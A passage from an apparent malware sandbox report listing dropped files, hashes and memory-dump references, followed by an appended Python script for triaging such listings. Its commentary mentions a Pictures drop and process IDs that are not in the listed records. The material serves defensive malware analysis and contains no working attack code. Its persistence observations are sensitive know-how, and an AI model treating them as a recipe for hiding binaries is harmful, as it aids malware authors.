SHA1 23412ed810c3830ca9bab8cd25c61cf7d70d0b5a
SHA256 fd02825ce17effb7d70ca2e9907647128241610bb1dce11a70f6f1a19d052047
SHA512 0dfb9bcd6dd8ce3f561b885989ae4c2e78c33f110aa1bf48c4c42c467db672af422ebdbf2ef66fe6f2e21307c036fbfa885e58fc3c4fa1f9677139e818855258

memory/2240-464-0x00007FFA54A50000-0x00007FFA5543C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-89M97.tmp\lightcleaner.tmp

MD5 7bf46cc89fa0ea81ece9fc0eb9d38807
SHA1 803040acb0d2dda44091c23416586aaeeed04e4a
SHA256 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649
SHA512 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41

memory/716-468-0x00000000033D0000-0x0000000003501000-memory.dmp

memory/3852-497-0x0000000000400000-0x000000000046A000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 7534b5b74212cb95b819401235bd116c
SHA1 787ad181b22e161330aab804de4abffbfc0683b0
SHA256 b05c6723077813dc9b48a2f1142db37ea63c672931d13a74d320f7d006756a04
SHA512 ea268788dc59ab78c0aadd4db9bbcf95493bf4eb2b5ae3d592e6876596246832fc574e7bc1348ce7922b32dcedcf71876ff59fb8beace5c06891ec897c9dac51

memory/784-549-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4316-551-0x0000000004DE0000-0x0000000004DF0000-memory.dmp

memory/4336-562-0x00007FFA54A50000-0x00007FFA5543C000-memory.dmp

memory/4316-565-0x0000000004DE0000-0x0000000004DF0000-memory.dmp

memory/4336-566-0x000002123E470000-0x000002123E480000-memory.dmp

memory/4336-568-0x000002123E470000-0x000002123E480000-memory.dmp

memory/3276-570-0x00007FFA61A30000-0x00007FFA61ADE000-memory.dmp

memory/3276-571-0x00007FFA5E880000-0x00007FFA5EAC9000-memory.dmp

memory/3276-572-0x00007FFA61FC0000-0x00007FFA6219B000-memory.dmp

memory/3276-573-0x00007FFA00030000-0x00007FFA00031000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310060634571\opera_package

MD5 1b4af0087d5df808f26f57534a532aa9
SHA1 d32d1fcecbef0e361d41943477a1df25114ce7af
SHA256 22c21ff3d0f5af1c2191318ea12921cfd5434afc32c0641d58fd3f3a218ea111
SHA512 e5a32022fd08464a24c89819703fd9f05c75bd5b47392aae186b96a8e1146fb0c98cda14bfec9a1393c0cdde706db77d32e7a9a86e4611c72103265982d31e07

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310060634571\assistant\Assistant_103.0.4928.16_Setup.exe_sfx.exe

MD5 34929f64d8dedc8ce887d9de6fce9c20
SHA1 4653d9c09aab6d3f8dd801ba97a6cced66f3b097
SHA256 3fb9093caabc82c8935ff184e11900068ce8d4ff17087f5a0edab423df146b90
SHA512 a2ac64860761dbee8fbfbb83d9f7a0f40fdb58758dc714b657fa4aaffd752d3c4c4847e77c2fcb94b54a2c09775caf95f3c9d94315b864cfc00ca839d7352a1c

C:\Users\Admin\AppData\Roaming\ibwdacj

MD5 3aabd684cee6bd8d66cb6b0cdd39f427
SHA1 efb2a6e24f860b36993362bab5978fe87c11d94b
SHA256 26bc8d3858f2512979aef222a18c60a22d4fa26541ed0226e31fafb36028441d
SHA512 32854d24b70ab5983bb3c54949162317beeb936df81fe0ad7927e89dd865dcbd51d6a6c5db293a148c916787826c9940c25f2aa6fddb395c73fe88d81019eef4
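The listing above is raw sandbox output: a path line followed by hash lines for each dropped file, plus memory/PID-index-start-end dump references. As an added example that is not part of this report or of the sandbox's own tooling, the Python below parses that record format, counts how often an identical record repeats, pivots on SHA256 to find one binary dropped under several paths (the Pictures drop cyyky2Es1gtRl2hQuenXn5si.exe and C:\Program Files\Google\Chrome\updater.exe share a digest above), and computes the size of every dumped memory region from its address range so the unpacked main image can be picked out first. The embedded input is a constructed subset of the records above with the SHA1 and SHA512 lines omitted; the function names are this example's own.

```python
import re
from collections import defaultdict

# Constructed sample input: a subset of the report's Files listing above,
# with only the MD5 and SHA256 lines kept (the report also carries SHA1/SHA512).
REPORT_FILES = r"""
C:\Users\Admin\Pictures\cyyky2Es1gtRl2hQuenXn5si.exe
MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e

C:\Program Files\Google\Chrome\updater.exe
MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe
MD5 3945df42a2cbe47502705ecde2ff2a87
SHA256 c767ecc88396047716862b881480450b517715bfc7bdd12c878cf2d54262f1f8

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe
MD5 3945df42a2cbe47502705ecde2ff2a87
SHA256 c767ecc88396047716862b881480450b517715bfc7bdd12c878cf2d54262f1f8

memory/2004-320-0x0000000000400000-0x0000000002675000-memory.dmp
memory/3852-306-0x0000000000400000-0x000000000046A000-memory.dmp
memory/3276-356-0x00007FFA621B0000-0x00007FFA621B2000-memory.dmp
"""

HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
MEMORY_LINE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<idx>\d+)-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)


def parse_file_records(text):
    """Return [(path, {algo: digest}), ...] for every file record, in listing order.

    A record is a path line followed by its hash lines; a blank line or a
    memory/ line ends it. Repeated records are kept so callers can count them."""
    records = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or MEMORY_LINE.match(line):
            current = None
            continue
        m = HASH_LINE.match(line)
        if m and current is not None:
            current[1][m.group(1)] = m.group(2).lower()
        elif not m:
            current = (line, {})
            records.append(current)
    return records


def same_binary_different_paths(records):
    """SHA256 -> sorted distinct paths, only for digests seen under more than one path.

    The same PE reappearing under a second path (here a browser updater location)
    is typically the persistence copy, so this is the first pivot worth making."""
    paths_by_digest = defaultdict(set)
    for path, hashes in records:
        if "SHA256" in hashes:
            paths_by_digest[hashes["SHA256"]].add(path)
    return {d: sorted(p) for d, p in paths_by_digest.items() if len(p) > 1}


def write_event_counts(records):
    """How many times each (path, SHA256) record appears in the listing."""
    counts = defaultdict(int)
    for path, hashes in records:
        counts[(path, hashes.get("SHA256"))] += 1
    return dict(counts)


def parse_memory_dumps(text):
    """Memory-dump entries with the region size computed from the address range."""
    dumps = []
    for raw in text.splitlines():
        m = MEMORY_LINE.match(raw.strip())
        if not m:
            continue
        start, end = int(m["start"], 16), int(m["end"], 16)
        dumps.append({"pid": int(m["pid"]), "idx": int(m["idx"]),
                      "start": start, "end": end, "size": end - start})
    return dumps


def largest_regions(text, n=2):
    """The n largest dumped regions, largest first. A region based at 0x400000
    and tens of MB long is the unpacked main image and the dump to triage first."""
    return sorted(parse_memory_dumps(text), key=lambda d: d["size"], reverse=True)[:n]


if __name__ == "__main__":
    recs = parse_file_records(REPORT_FILES)
    for digest, paths in same_binary_different_paths(recs).items():
        print(digest[:16], "->", paths)
    for (path, _), n in write_event_counts(recs).items():
        if n > 1:
            print(f"{n}x {path}")
    for d in largest_regions(REPORT_FILES):
        print(f"pid {d['pid']} idx {d['idx']} base 0x{d['start']:X} size {d['size']:,} bytes")
```

Run against the full Files listing, the same three passes give a deduplicated drop inventory, the hash-level link between the Pictures drops and the files planted under Program Files and AppData, and a size-ordered list of the memory dumps, of which the 0x400000-based, roughly 36 MB regions from PIDs 2004 and 4916 are the ones to pull into a disassembler first.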